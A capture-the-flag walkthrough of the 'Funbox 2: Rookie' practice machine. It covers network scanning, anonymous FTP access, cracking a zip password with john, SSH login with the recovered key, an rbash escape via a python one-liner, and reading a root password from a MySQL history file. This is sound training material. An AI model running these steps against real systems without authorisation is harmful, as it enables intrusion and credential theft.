Funbox 2: Rookie

Easy, boot2root, Real life like

(Image source: Internet)

There are 3 steps to get the root shell.

1. Enumeration: nmap scan reveals service info

2. Exploitation: password cracking and ssh

3. Privilege Escalation: MySQL history file

Now let's talk about the details of process.

1. Enumeration

1) First, I need the IP, so I am trying net discover.

netdiscover -i eth0 -r 10.0.0.0/16

I have got the IP: 10.0.2.34

2) Now trying nmap to scan all the open ports:

nmap -Pn -p- -v 10.0.2.34 

and the result is:

PORT STATE SERVICE 
21/tcp open ftp 
22/tcp open ssh 
80/tcp open http

3) For better enumeration, now I'm trying to scan only those 3 port:

nmap -sV -O -p 21,22,80 10.0.2.34

Now I have the version and OS details

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

4) Web page shows the default Apache page

5) Nikto scan reveals nothing but robots.txt

+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5ab414e93acbc, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found. 

6) Nothing interesting in robots.txt

7) As there is nothing interesting in web, let's try ftp. And I have found that anonymous ftp login is allowed. then tried to see all the files

ftp IP 

ftp> ls -a

drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 .
drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 ..
-rw-r--r-- 1 ftp ftp 153 Jul 25 11:06 .@admins
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
-rw-r--r-- 1 ftp ftp 114 Jul 25 11:07 .@users
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip

8) Can not wait to download these interesting files.

 wget -m ftp://anonymous:anonymous@10.0.2.34

9) .@users reveal some info:

 cat .@users

and it says:

Hi Users, be careful with your keys. Find them in %yourname%.zip. The passwords are the old ones. Regards root

10) Those .zip files are password protected. I have tried to unzip and failed.

2. Exploitation

11) let's try fcrackzip to get zip password and read.

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' tom.zip

I have failed and it shows nothing.

12) Now trying johnTheRipper to get password. But I need to create hash of files.

zip2john tom.zip>tom.hash 

After creating hash, I am able to run brute force attack.

13) I have used rockyou.txt as wordlist.

 john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash 

I have succeeded to get the password.

14) Let's unzip a file now. Trying to unzip (unzip tom.zip) and got id_rsa, which contains ssh key.

15) Now change the permission of id_rsa

chmod +x id_rsa

16) Login using this private key

ssh -i id_rsa tom@10.0.2.34

and I have failed to log in. Because, private key permission should be only for root.

17) Now changing the private key permission (chmod 600 id_rsa) and then trying to ssh again. This time I have succeeded.

18) After login, I have tried some commands and found that rbash is running. In this LINK you will find some useful way to bypass bash restriction.

3. Privilege Escalation

19) Importing python bash shell solves the problem.

python3 -c ‘import os; os.system("/bin/bash");’

20) I have got .mysql_history and trying to read it

21) The history file reveals some info but in a formatted way like this

show\040databases;

quit

create\040database\040'support';

create\040database\040support;

so I have removed the space and make it understandable

sed "s/\\\040/ /g" < .mysql_history

It reveals password!

22) The root password is: xx11yy22!

Now I can login as root

sudo su

after changing directory (cd /root) I can now read the root flag.